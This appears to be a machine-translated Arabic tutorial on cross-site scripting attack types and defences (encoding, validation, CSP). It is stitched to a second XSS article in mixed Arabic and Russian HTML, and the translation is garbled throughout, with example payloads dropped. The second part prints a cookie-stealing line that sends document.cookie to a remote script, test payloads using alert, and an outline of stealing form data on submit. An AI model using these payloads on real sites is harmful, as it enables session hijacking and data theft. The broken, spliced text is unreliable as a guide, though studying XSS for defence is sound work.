عبر الموقع XSS البرمجة النصية. باستخدام نقاط الضعف XSS إلى الحد الأقصى. إزالة الرمز الخاص بك

وهو كتاب مدرسي شامل على البرمجة النصية عبر الموقع.

الجزء الأول: نظرة عامة

ما هو XSS؟

البرمجة النصية المتقدمة ( الإنجليزية عبر موقع البرمجة) - هذا هجوم يهدف إلى تنفيذ رمز يسمح للمهاجم بأداء JavaScript الضارة في متصفح مستخدم آخر.

المهاجم لا يهاجم تضحيه مباشرة. بدلا من ذلك، يستخدم مشكلة عدم حصانة موقع الويب يزور الضحية وينفذ رمز جافا سكريبت ضار. في متصفح الضحية، يتم عرض JavaScript الضارة كجزء مشروع من موقع الويب، والموقع نفسه بمثابة شريك مهاجم مباشر.

تنفيذ رمز جافا سكريبت ضار

الطريقة الوحيدة لمهاجمة إطلاق جافا سكريبت ضار في متصفح الضحايا هي تقديمها إلى واحدة من الصفحات التي يتم فيها تنزيل الضحية من الموقع. هذا ممكن إذا كان الموقع يسمح للمستخدمين بإدخال البيانات على صفحاتهم، وسيتمكن المهاجم من إدراج سلسلة يتم تحديدها كجزء من التعليمات البرمجية في متصفح الضحية.

يظهر المثال أدناه برنامج نصي خادم بسيط يستخدم لعرض آخر تعليق على الموقع:

مطبعة " "
مطبعة "آخر تعليق:"
طباعة قاعدة البيانات
مطبعة ""

يفترض البرنامج النصي أن التعليق يتكون فقط من النص. ومع ذلك، منذ فوري مدخلات مخصصةالمهاجم يمكن أن يترك هذا التعليق: "". أي مستخدم يقوم بزيارة الصفحة سيتلقى الآن الإجابة التالية:

آخر تعليق:

عندما يقوم مستعرض المستخدم بتحميل الصفحة، سيؤدي ذلك إلى أداء كل شيء، بما في ذلك رمز JavaScript الموجود داخل العلامات وبعد يشير ذلك إلى أن الوجود البسيط للسيناريو الذي ينفذه المهاجم يمثل مشكلة، بغض النظر عن رمز البرنامج النصي معين يتم تنفيذه بالفعل.

الجزء الثاني: هجوم XSS

XSS الهجوم المشاركين

قبل وصف كيفية وصف بالتفصيل كيف يعمل هجوم XSS، نحتاج إلى تحديد مواضيع هجوم XSS. بشكل عام، في هجوم XSS هناك ثلاثة مشاركين: موقع إلكتروني, ضحية، أنا. لص.

موقع إلكتروني يعطي صفحات HTML للمستخدمين الذين طلبتهم. في أمثلةنا، يقع على موقع http: // الموقع /.
- قاعدة بيانات الموقع إنها قاعدة بيانات تقوم بتخزين بعض البيانات التي أدخلها المستخدمون على صفحات الموقع.
ضحية - هذا هو المستخدم العادي الموقع الذي يطلب الصفحات مع متصفحه.
مهاجمة - هذا مهاجم يعتزم بدء هجوم على الضحية من خلال استخدام مشكلة عدم حصانة XSS على الموقع.
- خادم اللص - هذا خادم ويب تحت سيطرة المهاجم مع الغرض الوحيد - سرقة معلومات الضحية السرية. في أمثلةنا، يقع على HTTP: // المهاجم /.

مثال هجوم سيناريو

سيقوم هذا البرنامج النصي بإنشاء طلب HTTP إلى عنوان URL آخر، مما سيعيد توجيه متصفح المستخدم إلى خادم المهاجم. يتضمن عنوان URL ملفات تعريف الارتباط للضحية كمعلمة استعلام عندما يأتي طلب HTTP إلى خادم المهاجم، يمكن للمهاجم استخراج ملفات تعريف الارتباط هذه من الطلب. بعد تلقي المهاجم ملفات تعريف الارتباط، يمكنه استخدامها لإعطاء نفسه للتضحية وبدء هجوم لاحق.

من هذه النقطة على رمز HTML الموضح أعلاه سيتم استدعاء سلسلة ضارة أو سيناريو ضاروبعد من المهم أن نفهم أن السلسلة نفسها خبيثة فقط إذا تم معالجة رمز HTML في نهاية المطاف في متصفح الضحية، وقد يحدث هذا فقط في حالة توفر مشكلة عدم حصانة XSS على الموقع الإلكتروني.

كيف يعمل هذا المثال

يوضح المخطط أدناه مثالا على هجوم من قبل المهاجم:

يستخدم المهاجم أحد أشكال الموقع من أجل إدراج سلسلة ضارة إلى قاعدة بيانات الويب.
الضحية يسأل الصفحة من الموقع.
يتضمن الموقع سلسلة ضارة من قاعدة البيانات استجابة ويرسلها إلى الضحية.
يقوم متصفح الضحايا بإجراء سيناريو ضار ضمن الإجابة، وإرسال الضحايا إلى خادم المهاجم.

أنواع XSS.

الغرض من هجوم XSS يرجع دائما إلى ضارة جافا سكريبت سيناريو في متصفح الضحية. هناك العديد من الطرق المختلفة بشكل أساسي لتحقيق هذا الهدف. غالبا ما يتم تقسيم هجمات XSS إلى ثلاثة أنواع:

تخزين (دائم) XSSحيث تنشأ السلسلة الضارة من قاعدة بيانات الموقع.
تعكس (غير دائم) XSSحيث يتم إنشاء سلسلة ضارة من طلب الضحية.
XSS نماذج دومحيث تحدث الثغرة الأمنية في التعليمات البرمجية على جانب العميل، وليس على جانب رمز الخادم.

في المثال السابق، يظهر هجوم XSS المخزن. الآن وصفنا نوعين آخرين من هجمات XSS: عكس XSS ونماذج DOM الهجوم XSS.

تعكس XSS.

في حالة هجوم XSS المنعكس، تعد سلسلة ضارة جزءا من طلب الضحية إلى موقع الويب. يتلقى الموقع وإدراج هذه السلسلة الضارة إلى المستخدم المرسلة إلى المستخدم. يوضح المخطط أدناه هذا البرنامج النصي:

الضحية ترسل احتيالي طلب URL إلى الموقع الإلكتروني.
يتضمن الموقع سلسلة ضارة من استعلام URL استجابة للضحية.
يقوم متصفح الضحية بإجراء سيناريو خبيث يحتوي على الإجابة، وإرسال الضحايا إلى الخادم المتسللين.

كيفية القيام بنجاح هجوم XSS المنعكس؟

قد يبدو هجوم XSS المنعكس غير ضار، لأنه يتطلب الضحية من اسمه لإرسال طلب يحتوي على سلسلة ضارة. نظرا لأنه لن يهاجم أحد طوعا نفسه، إلا أنه يبدو أنه لا توجد وسيلة للتنفيذ الفعلي للهجوم.

كما اتضح، هناك طريقتان مشتركان على الأقل لجعل التضحية لبدء هجوم XSS ينعكس ضد نفسه:

إذا كان المستخدم شخصية محددة، فيمكن للمهاجم إرسال عنوان URL ضاريا للضحية (على سبيل المثال، باستخدام البريد الإلكتروني أو الرسائل)، وخداع لإجباره على فتح رابط لزيارة الموقع الإلكتروني.
إذا كان الهدف هو مجموعة كبيرة من المستخدمين، فيمكن للمهاجم نشر رابط لعنوان URL الضار (على سبيل المثال، على موقع الويب الخاص به أو في شبكة اجتماعية) وانتظر الزوار الذين سوف يذهبون على الرابط.

كل من هذه الأساليب متشابهة، وقد يكون كلاهما أكثر نجاحا باستخدام الخدمات "تقصير" عنوان URL، فهم يخفي السلسلة الخبيثة من المستخدمين الذين يمكنهم تحديدها.

XSS في نموذج دوم

XSS في نموذج DOM هو خيار كهجوم XSS المخزن ويعكس. في هجوم XSS هذا، لا تتم معالجة السلسلة الضارة من قبل متصفح الضحية، حتى يتم تنفيذ JavaScript الحقيقي للموقع. يوضح المخطط أدناه هذا البرنامج النصي لهجمات XSS المنعكس:

يقوم المهاجم بإنشاء عنوان URL الذي يحتوي على سلسلة ضارة ويرسله إلى الضحية.
الضحية ترسل احتيالي طلب URL إلى الموقع الإلكتروني.
يتلقى الموقع طلبا، لكنه لا يشمل سلسلة ضارة استجابة.
يقوم متصفح الضحية بإجراء سيناريو مشروع موجود في الإجابة، مما أدى إلى سيناريو ضار سيتم إدراجها في الصفحة.
يقوم متصفح الضحية بإجراء برنامج نصي ضار مدرج في الصفحة، وإرسال ملفات تعريف الارتباط الضحية إلى الخادم المتسلل.

ما هو الفرق بين XSS في نموذج دوم؟

في الأمثلة السابقة من هجمات XSS المخزنة والمكسورة، يقوم الخادم بإدراج برنامج نصي ضار إلى الصفحة، والتي يتم إرسالها بعد ذلك استجابة للضحية. عندما تلقى متصفح الضحية إجابة، يفترض أن البرنامج النصي الضار هو جزء من المحتوى الشرعي للصفحة، ويتم تشغيله تلقائيا أثناء تحميل الصفحة، بالإضافة إلى أي سيناريو آخر.

في مثال هجمات XSS في طراز DOM، لا يتم إدراج البرنامج النصي الخبيث كجزء من الصفحة؛ البرنامج النصي الوحيد الذي يتم تنفيذه تلقائيا أثناء تحميل الصفحة هو جزء مشروع من الصفحة. المشكلة هي أن هذا السيناريو الشرعي يستخدم مباشرة إدخال المستخدم من أجل إضافة HTML إلى الصفحة. نظرا لأن السلسلة الضارة مدرجة في الصفحة باستخدام Innerhtml، يتم تحليلها كأملاء HTML، ونتيجة لذلك سيتم تنفيذ البرنامج النصي الضار.

هذا التمييز صغير، ولكنه مهم للغاية:

في XSS التقليدية، يتم تنفيذ JavaScript الضارة عند تحميل الصفحة، كجزء من HTML المرسل بواسطة الخادم.
في حالة XSS في نموذج DOM، يتم إجراء JavaScript الضارة بعد تحميل الصفحة، نتيجة لذلك، تتم الإشارة إلى هذه الصفحة مع جافا سكريبت شرعية كوسيلة غير آمنة لإدخال المستخدم (تحتوي على سلسلة ضارة).

كيف يعمل XSS في نموذج DOM؟

في المثال السابق، ليست هناك حاجة لجافا سكريبت؛ يمكن للخادم إنشاء كل HTML بحد ذاته. إذا كان الرمز الموجود على جانب الخادم لا يحتوي على ثغرات نقاط الضعف، فلن يخضع الموقع لمكثير نقاط XSS.

ومع ذلك، نظرا لأن تطبيقات الويب أصبحت أكثر تقدما، يتم إنشاء كمية متزايدة من صفحات HTML باستخدام JavaScript على جانب العميل، وليس على الخادم. في أي وقت، يجب أن يتغير المحتوى دون تحديث الصفحة بأكملها، فمن الممكن باستخدام JavaScript. على وجه الخصوص، هذا هو الحال عند تحديث الصفحة بعد استعلام AJAX.

هذا يعني أن نقاط الضعف XSS قد تكون موجودة ليس فقط في جزء الخادم من رمز موقعك، ولكن أيضا على جانب رمز JavaScript الخاص بعميل موقعك. وبالتالي، حتى مع وجود رمز آمن بالكامل على جانب الخادم، لا يزال بإمكان رمز العميل ممكنا بأمان لإدخال بيانات المستخدم عند تحديث الدوم بعد تنزيل الصفحة. إذا حدث هذا، فإن الرمز من العميل سيسمح لهجوم XSS ليس خطأ الكود من جانب الخادم.

XSS بناء على نموذج DOM يمكن أن يكون غير مرئي للخادم

هناك حالة خاصة لهجمات XSS في نموذج DOM حيث لا يتم إرسال سلسلة ضارة إلى خادم موقع الويب: يحدث هذا عندما يتم احتواء السلسلة الخبيثة في جزء معرف URL (شيء ما بعد الرمز #). لا ترسل المتصفحات هذا الجزء من عنوان URL إلى الخادم، لذلك لا يحتوي الموقع على الوصول إليه باستخدام الرمز الموجود على جانب الخادم. ومع ذلك، فإن الرمز من العميل لديه حق الوصول إليه، وبالتالي فمن الممكن إجراء هجوم XSS من خلال معالجة غير آمنة.

هذه القضية لا تقتصر على معرف الشظايا. يوجد أيضا إدخال مستخدم آخر غير مرئي للخادم، على سبيل المثال، وظائف HTML5 الجديدة، مثل Localstorage و Indexeddd.

الجزء الثالث:
XSS الوقاية

أساليب الوقاية من XSS

أذكر أن XSS هو هجوم من نوع نشر التعليمات البرمجية: يتم تفسير المستخدم الذي أدخله المستخدم عن طريق الخطأ كتعويض برنامج برنامج ضار. من أجل منع هذا النوع من الحقن الرمز، يلزم معالجة الإدخال الآمنة. لمطور الويب، هناك اثنان من الأساسي أساليب مختلفة إجراء معالجة الإدخال الآمنة:

ترميز - هذه هي الطريقة التي تتيح لك إدخال البيانات من قبل المستخدم فقط كبيانات ولا تسمح بمعالجة المتصفح كصفوفة.
تصديق - تقوم هذه الطريقة بمرشحات المستخدم إدخال المستخدم بحيث يفسر المستعرض كصنونة بدون أوامر ضارة.

على الرغم من أن هذه طرق مختلفة بشكل أساسي لمنع XSS، فإن لديهم عدة سمات عامة مهمة لفهمها عند استخدام أي منها:

يجب أن يتم معالجة معالجة الإدخال الآمن السياق بشكل مختلف حسب المكان الذي يتم فيه استخدام إدخال المستخدم في الصفحة. يمكن إجراء معالجة الإدخال الآمنة الواردة / المنتهية ولايتها إما عندما يتلقى موقعك بيانات الإدخال (حركة المرور الواردة) أو مباشرة قبل إدراج الموقع إدخال مخصص في محتويات الصفحة (المنتهية ولايته). يمكن إجراء معالجة الإدخال الآمنة العميل / الخادم إما على جانب العميل أو على جانب الخادم، كل خيار ضروري ضمن ظروف مختلفة.

قبل الشرح في تفاصيل كيفية عمل الترميز والتحقق من الصحة، نصف كل من هذه العناصر.

معالجة مدخلات المستخدم في السياقات

هناك العديد من السياقات على صفحة ويب حيث يمكن تطبيق إدخال مخصص. يجب تلبية القواعد الخاصة لكل منها بحيث لا يمكن إدخال المستخدم "الخروج" من سياقه ولا يمكن تفسيره كصنونة ضارة. فيما يلي السياقات الأكثر شيوعا:

ما معنى السياقات؟

في جميع السياقات الموصوفة، قد تحدث مشكلة عدم الحصانة التي تؤدي إلى XSS إذا تم إدخال المستخدم الذي أدخله المستخدم إلى الترميز أو التحقق من الصحة الأول. يمكن للمهاجم تقديم شفرة ضارة ببساطة إدراج فاصل إغلاق لهذا السياق وبعد ذلك هو رمز ضار.

على سبيل المثال، إذا كان موقع الويب في مرحلة ما يشمل إدخال البيانات من قبل المستخدم مباشرة في سمة HTML، فسيكون المهاجم قادرا على تطبيق برنامج نصي ضار عن طريق بدء إدخال اقتباسه كما هو موضح أدناه:

يمكن منع هذا، ببساطة إزالة جميع علامات الاقتباس في إدخال المستخدم، وكل شيء سيكون على ما يرام، ولكن فقط في هذا السياق. إذا تم إدراج المدخلات في سياق آخر، فسيختلف فاصل الإغلاق وسيصبح الحقن ممكنا. لهذا السبب، يجب دائما تكييف معالجة إدخال آمنة للمدخلات مع السياق حيث سيتم إدراج إدخال المستخدم.

معالجة إدخال المستخدم الوارد / الصادر

غريزي، قد يبدو أنه يمكن منع XSS بواسطة الترميز أو التحقق من صحة إدخال المستخدم بأكمله، بمجرد أن يتلقى موقعنا. وبالتالي، سيتم بالفعل تحييد أي خطوط ضارة كلما يتم تضمينها في الصفحة، ولا يجب على البرامج النصية لتوليد HTML العناية بالمعالجة الآمنة لإدخال المستخدم.

المشكلة هي أنه كما هو موضح سابقا من قبل المستخدم الذي أدخله المستخدم يمكن إدراجها في عدة سياقات على الصفحة. و لا طريقة بسيطة حدد متى يأتي إدخال المستخدم في السياق - حيث سيتم إدراجه في النهاية، وغالبا ما يتم إدخال إدخال المستخدم نفسه في سياقات مختلفة. الاعتماد على معالجة المدخلات الواردة لمنع XSS، نقوم بإنشاء حل هش للغاية سيكون عرضا للأخطاء. (اقتباسات سحرية قديمة "PHP هي مثال على هذا الحل.)

بدلا من ذلك، يجب أن يكون معالجة المدخلات الصادرة خط الحماية الرئيسي من XSS، لأنه يمكن أن يأخذ في الاعتبار السياق المحدد، الذي سيتم إدخال المستخدم الذي أدخله المستخدم. إلى حد ما، يمكن استخدام التحقق الوارد لإضافة طبقة حماية ثانوية، ولكن هذا في وقت لاحق.

حيث من الممكن إجراء معالجة مدخلات المستخدم الآمنة

في معظم تطبيقات الويب الحديثة، تتم معالجة إدخال المستخدم على جانب رمز الخادم وعلى جانب رمز العميل. من أجل الحماية من جميع أنواع XSS، يجب تنفيذ معالجة الإدخال الآمنة في الكود على جانب الخادم وجانب رمز العميل.

من أجل الحماية من XSS التقليدية، يجب إجراء معالجة الإدخال الآمنة في التعليمات البرمجية على جانب الخادم. يتم ذلك مع لغة مدعومة من قبل الخادم.
من أجل الحماية من هجوم XSS في نموذج DOM، حيث لا يتلقى الخادم سلسلة خبيثة (على سبيل المثال، يجب أن يتم تنفيذ الهجوم الذي سبق وصفه عبر جزء المعرف)، يجب إجراء معالجة الإدخال الآمنة في التعليمات البرمجية على جانب العميل. يتم ذلك مع جافا سكريبت.

الآن، عندما شرحنا لماذا يهم السياق، لماذا الفرق بين معالجة الإدخال الواردة والصادر غير مهم، ولماذا يجب إجراء معالجة الإدخال الآمنة على كلا الجانبين، وعلى جانب العميل وعلى جانب الخادم، يمكننا الاستمرار في شرح كيف يتم تنفيذ نوعين من معالجة الإدخال الآمنة (الترميز والتحقق) بالفعل.

ترميز

الترميز هو وسيلة للخروج من الوضع عندما يكون من الضروري أن يفسر مستعرض إدخال المستخدم فقط كبيانات، وليس رمز. النوع الأكثر شيوعا من الترميز في تطوير الويب هو HTML اخفاء يحول الأحرف مثل < و > في < و > على التوالى.

PSEUdocode التالي هو مثال على كيفية ترميز المستخدم الذي أدخله المستخدم (Enter Enter) باستخدام اخفاء HTML ثم إدراج الصفحة باستخدام سيناريو الخادم:

مطبعة " "
مطبعة "آخر تعليق:"
طباعة encodehtml (userinput)
مطبعة ""

إذا دخل المستخدم السطر التالي سوف تبدو HTML الناتجة مثل هذا:

آخر تعليق:

نظرا لأن جميع الرموز ذات القيم الخاصة كانت مقنعة، فلن يقوم المتصفح بتفكيك أي جزء من إدخال المستخدم ك HTML.

رمز الترميز على جانب العميل والخادم

عند ترميز رمز الترميز من العميل، يتم استخدام لغة JavaScript دائما، والتي تحتوي على وظائف مضمنة تشفير البيانات لمختلف سياقات مختلفة.

عند إجراء الترميز في التعليمات البرمجية الخاصة بك على جانب الخادم، فإنك تعتمد على الميزات المتاحة بلغتك أو إطارك. بسبب عدد كبير اللغات والأطر المتاحة المقدمة درس تعليمي لن تغطي تفاصيل الترميز في أي خادم أو إطار معين. ومع ذلك، يتم استخدام وظائف ترميز JavaScript المستخدمة على جانب العميل عند كتابة التعليمات البرمجية على جانب الخادم.

الترميز على جانب العميل

عند ترميز إدخال عميل مخصص باستخدام JavaScript، هناك العديد من الأساليب والخصائص المضمنة التي ترميز جميع البيانات تلقائيا إلى نمط تعتمد على السياق:

لم يتم تضمين السياق الأخير المذكور أعلاه أعلاه (القيم في JavaScript) في هذه القائمة، لأن JavaScript لا توفر طريقة ترميز البيانات المدمجة، والتي سيتم تمكينها في التعليمات البرمجية المصدر JavaScript.

قيود الترميز

حتى عند الترميز، من الممكن استخدام الخطوط الخبيثة في بعض السياقات. مثال مشرق على هذا هو عندما يتم استخدام إدخال المستخدم لتوفير عنوان URL، على سبيل المثال، في المثال أدناه:

document.QuerySelector ("A"). HREF \u003d UserInput

على الرغم من أن القيمة المحددة في خاصية عنصر HREF ترميزها تلقائيا بحيث لا تصبح أكثر من قيمة السمة، إلا أن هذا في حد ذاته لا يتداخل مع المهاجم إدراج عنوان URL بدءا من "JavaScript:". عند النقر فوق الارتباط، بغض النظر عن البناء، سيتم تنفيذ JavaScript المدمج داخل عنوان URL.

الترميز ليس أيضا حلا فعالا عندما تريد المستخدمين استخدام جزء من رموز HTML على الصفحة. مثال على ذلك صفحة ملف تعريف المستخدم، حيث يمكن للمستخدم استخدام HTML المستخدم. إذا تم ترميز HTML هذا المعتاد، فستتمكن صفحة الملف الشخصي من التصالح فقط من النص البسيط.

في مثل هذه الحالات، يجب الاستكمال الترميز بالتحقق من الصحة التي سنحصل عليها أكثر.

تصديق

التحقق من صحة هو فعل إدخال المستخدم في تصفية المستخدم بحيث تتم إزالة جميع الأجزاء الخبيثة دون الحاجة إلى إزالة الرمز بأكمله فيه. واحدة من أكثر أنواع التحقق المستخدمة في تطوير الويب تتيح لك استخدام بعض عناصر HTML (على سبيل المثال، و ) ولكن من فوربوفوف الآخرين (على سبيل المثال،

مع وجود سياسة CSP محددة بشكل صحيح، لا يمكن للمتصفح تنزيل وتنفيذ Script.js الضارة وتنفيذها لأن HTTP: // المهاجم / غير محدد كمصدر موثوق. على الرغم من فشل الموقع في معالجة إدخال المستخدم بشكل آمن في هذه الحالة، فإن سياسة CSP منعت الثغرة الأمنية وتسبب أي ضرر.

حتى إذا قام المهاجم بحقنه بواسطة الرمز داخل رمز السيناريو، وليس بالرجوع إلى الملف الخارجي، فإن سياسة CSP التي تم تكوينها بشكل صحيح ستقوم أيضا بتعطيل الحقن في كود JavaScript منع الضعف وتسبب أي ضرر.

كيفية تمكين CSP؟

بشكل افتراضي، لا تستخدم المتصفحات CSP. من أجل تمكين SCP على موقع الويب الخاص بك، يجب أن تحتوي الصفحات على رأس HTTP إضافي: سياسة الأمان المحتوى. ستطبق أي صفحة تحتوي على هذا العنوان سياسات الأمان أثناء تشغيل المستعرض، شريطة أن يدعم المستعرض CSP.

نظرا لأن سياسة الأمان يتم إرسالها مع كل استجابة HTTP، فمن الممكن تثبيت سياسة بشكل فردي على الخادم بشكل فردي لكل صفحة. يمكن تطبيق نفس السياسة على الموقع بأكمله، وإدخال رأس CSP نفسه في كل رد.

يحتوي المحتوى الموجود في رأس سياسة الأمان على المحتوى على سلسلة تحديد سياسات أمان واحدة أو أكثر تعمل على موقعك. سيتم وصف بناء جملة هذه السلسلة أدناه.

أمثلة على رؤوس هذا القسم يستخدم نقل الصفوف ومسافات البادئة بساطة التصور؛ يجب ألا يكونوا حاضرين في الرأس الحالي.

بناء جملة CSP.

يبدو بناء جملة رأس CSP هذا:

السياسة الأمنية للمحتوى:
التوجيه تعبير المصدر., تعبير المصدر., ...;
التوجيه ...;
...

يتكون هذا بناء الجملة من عنصرين:

التوجيهات (التوجيهات) تقديم الخطوط التي تشير إلى نوع المورد الذي تم نقله من القائمة المحددة.

تعبيرات المصدر إنه نموذج يصف أحد الخوادم أو أكثر من حيث يمكن تنزيل الموارد.

لكل توجيه، تحدد البيانات الموجودة في تعبير المصدر المصادر التي يمكن استخدامها لتحميل موارد النوع المناسب.

التوجيه

يمكن استخدام التوجيهات التالية في رأس CSP:

connect-SRC.

font-src.

الإطار SRC.

iMG-SRC.

media-SRC.

كائن SRC.

script-SRC.

style-SRC.

بالإضافة إلى ذلك، يمكن استخدام التوجيه الخاص الافتراضي SRC لضمان القيمة الافتراضية لجميع التوجيهات التي لم يتم تضمينها في العنوان.

التعبير عن المصدر

بناء الجملة لإنشاء تعبير عن المصدر هو كما يلي:

البروتوكول: // اسم المضيف: رقم المنفذ

يمكن أن يبدأ اسم المضيف *، وهذا يعني أنه سيتم حل أي مجال فرعي لاسم المضيف المقدمة. وبالمثل، يمكن تمثيل رقم المنفذ باسم *، وهذا يعني أنه سيتم حل جميع المنافذ. بالإضافة إلى ذلك، يمكن تفويت بروتوكول ورقم المنفذ. إذا لم يتم تحديد البروتوكول، فستحتاج السياسة إلى تحميل جميع الموارد باستخدام HTTPS.

بالإضافة إلى بناء الجملة أعلاه، قد يكون التعبير عن المصدر واحدا من أربعة كبديل الكلمات الدالة مع قيمة خاصة (يتم تضمين علامات الاقتباس):
"لا شيء" يحظر الموارد. يسمح "الذات" بالموارد من المضيف الموجود فيه صفحة الويب. يسمح "غير آمنة" "بالموارد الواردة في الصفحة مثل المدمجة
بطريقة ما ليست مخيفة جدا :) ما يمكن أن يكون حقا خطرة هذه الضعف؟
السلبي والنشط
هناك نوعان من نقاط الضعف XSS - السلبي والنشط.
الضعف النشط أكثر خطورة، حيث لا يحتاج المهاجم إلى إغراء التضحية على رابط خاص، فهو يكفي له لتنفيذ التعليمات البرمجية في القاعدة أو بعض الملفات على الخادم. وبالتالي، فإن جميع زوار الموقع يصبحون ضحايا تلقائيا. يمكن دمجها، على سبيل المثال، عن طريق تضمين رمز SQL (حقن SQL). لذلك، يجب ألا تثق في البيانات المخزنة في قاعدة البيانات، حتى إذا تم معالجةها في إدراجها.
مثال الضعف السلبي يمكنك أن ترى في بداية المقال. هناك بالفعل هندسة اجتماعية، على سبيل المثال، رسالة مهمة من إدارة الموقع تطلب منك التحقق من إعدادات حسابك، بعد الاسترداد من النسخة الاحتياطية. تبعا لذلك، تحتاج إلى معرفة عنوان الضحية أو ببساطة ترتيب رسالة إخبارية SPAM أو ضع منشورا على بعض المنتدى، وليس حتى الآن أن الضحايا سيكونون ساذجينين ويذهبون إلى رابطك.
علاوة على ذلك، يمكن أن تخضع نقاط الضعف السلبية لكل من المنشور والحصول على المعلمات. مع Post-Parameters، سيتم فهم ذلك، سيتعين عليك الذهاب في الحيل. على سبيل المثال، إعادة توجيه من موقع الدخيل.

">

وبالتالي، فإن مشكلة عدم الحصانة أكثر خطورة قليلا، ل الضحية أسهل لاحظ المجال الخطأ من المعلمة الإضافية (على الرغم من أن عنوان URL يمكن ترميزه على الإطلاق).
بسكويت
هذا هو المثال الأكثر استشهدا لهجمات XSS. في مواقع ملفات تعريف الارتباط أحيانا تخزين أي معلومات قيمة (حتى الآن حتى تسجيل الدخول وكلمة المرور (أو تجزئة) للمستخدم)، ولكن أخطر هي سرقة جلسة نشطة، لذلك لا تنس الضغط على رابط "الخروج" على المواقع، حتى وإن كانت الكمبيوتر المنزليوبعد لحسن الحظ، في معظم الموارد، عمر الجلسة محدود.
var іmg \u003d صورة جديدة ()؛ іmg.sps \u003d "http: //site/xss.php؟" + document.cookie؛
لذلك، فإن قيود المجال على XMLHTPRequest، ولكن المهاجم ليس مخيفا لأن هناك , <img>, <script>, background:url(); и т.п.</p><h3>Кража данных из форм</h3><p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p><p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p><h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3><p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><h3>Подделка межсайтовых запросов (CSRF/XSRF)</h3><p>Также имеет косвенное отношение к XSS. Вообще это отдельный тип уязвимости, но часто используется совместно с XSS. Суть заключается в том, что пользователь, авторизированный на неуязвимом сайте, заходит на уязвимый (или специальную страницу злоумышленника), с которого отправляется запрос на совершение определенных действий.</p><p>Грубо говоря, в идеале это должно быть так. Пользователь авторизировался в системе платежей. Потом зашел на сайт злоумышленника или сайт с XSS-уязвимостью, с которого отправился запрос на перевод денег на счет злоумышленника.</p><p>Поэтому большинство сайтов при совершении определенных действий пользователя (например, смена e-mail) переспрашивают пароль или просят ввести код подтверждения.</p><h3>XSS-черви</h3><p>Этот тип атаки появился, наверное, благодаря соцсетям, таким как Вконтакте и Twitter. Суть в том, что нескольким пользователям соцсети посылается ссылка с XSS-уязвимостью, когда они перейдут по ссылке, то интегрированный скрипт рассылает сообщения другим пользователям от их имени и т.д. При этом могут совершаться и другие действия, например отсылка личных данных жертв злоумышленнику.</p><h3>Безобидный XSS</h3><p>Интересно, что счетчики по своей сути тоже являются в некотором роде активной XSS-атакой. Ведь на сторонний сервер передаются данные о посетителе, как, например, его IP-адрес, разрешение монитора и т.п. Только код в свою страничку вы интегрируете по собственной воле:) Взгляните, например, на код Google Analytic.</p> <p>Межсайтовый скриптинг (XSS) - это уязвимость, которая заключается во внедрении кода, исполняемого на стороне клиента (JavaScript) в веб-страницу, которую просматривают другие пользователи.</p> <p>Уязвимость возникает из-за недостаточной фильтрации данных, которые пользователь отправляет для вставки в веб-страницу. Намного проще понять на конкретном пример. Вспомните любую гостевую книгу - это программы, которые предназначены для принятия данных от пользователя и последующего их отображения. Представим себе, что гостевая книга никак не проверяет и не фильтрует вводимые данные, а просто их отображает.</p> <p>Можно набросать свой простейший скрипт (нет ничего проще, чем писать плохие скрипты на PHP - этим очень многие занимаются). Но уже предостаточно готовых вариантов. Например, я предлагаю начать знакомство с Dojo и OWASP Mutillidae II. Там есть похожий пример. В автономной среде Dojo перейдите в браузере по ссылке: http://localhost/mutillidae/index.php?page=add-to-your-blog.php</p> <p>Если кто-то из пользователей ввёл:</p><p>То веб-страница отобразит:</p><p>Привет! Нравится твой сайт. </p><p>А если пользователь введёт так:</p><p>Привет! Нравится твой сайт.<script>alert("Pwned")</script> </p><p>سيتم عرض ذلك مثل هذا:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x02-6.jpg.pagespeed.ic.1-A3eqySoq.jpg' width="100%" loading=lazy loading=lazy></p> <p>المستعرضات الحفاظ على العديد من ملفات تعريف الارتباط لعدد كبير من المواقع. كل موقع يمكن أن تحصل على ملفات تعريف الارتباط المحفوظة فقط لهم. على سبيل المثال، احتفظ موقع الويب examply.com ببعض ملفات تعريف الارتباط في متصفحك. أنت تعطل موقع الويب الخاص بالآخرين، لا يمكن لهذا الموقع (البرامج النصية العميلة والخادم) الوصول إلى ملفات تعريف الارتباط التي حفظها موقع الويب examply.com.</p> <p>إذا كان الموقع examply.com عرضة للخدمة XSS، فهذا يعني أننا نستطيع بطريقة أو بأخرى لتنفيذ رمز JavaScript في ذلك، وسيتم تنفيذ هذا الرمز نيابة عن الموقع أولئك. سيتلقى هذا الرمز، على سبيل المثال، الوصول إلى موقع ملف تعريف الارتباط.</p> <p>أعتقد أن الجميع يتذكرون أنه يتم تنفيذ JavaScript في متصفحات المستخدمين، أي إذا كان هناك XSS، فإن البرامج الضارة المضمنة تتلقى الوصول إلى بيانات المستخدم التي فتحت صفحة الويب.</p> <p>الرمز المضمن قادر على كل ما تستطيع جافا سكريبت، أي:</p> <ul><li>الوصول إلى ملفات تعريف الارتباط من الموقع المشاهد</li> <li>يمكن أن تجعل أي تغييرات في <a href="https://ilyarm.ru/ar/obzor-highscreen-yummy-duo-smartfon-s-dvumya-sim-kartami-i-bolshim.html">مظهر خارجي</a> الصفحات</li> <li>الوصول إلى البورصة المخزن المؤقت</li> <li>يمكن تطبيق البرامج على جافا سكريبت، على سبيل المثال، Loggers KI (معترض المفتاح دفعت)</li> <li>لمس على لحوم البقر.</li> <li>وإلخ.</li> </ul><p>أبسط مثال مع Cookiz:</p><p> <script>alert(document.cookie)</script> </p><p>فعلا، <b>يحذر.</b> يستخدم فقط للكشف عن XSS. البرامج الضارة الحقيقية حمولات الإجراءات المخفية. إنه يرتبط مخفيا بخادم دائم بعيد ونقل البيانات المسروقة عليه.</p> <h2>أنواع XSS. <br></h2> <p>الشيء الأكثر أهمية هو أنك بحاجة إلى فهم أنواع XSS ما يحدث:</p> <ul><li>مخزنة (ثابت)</li> <li>ينعكس (غير دائم)</li> </ul><p>مثال دائم:</p> <ul><li>قدم المهاجم رسالة مشكلة خصيصا إلى دفتر 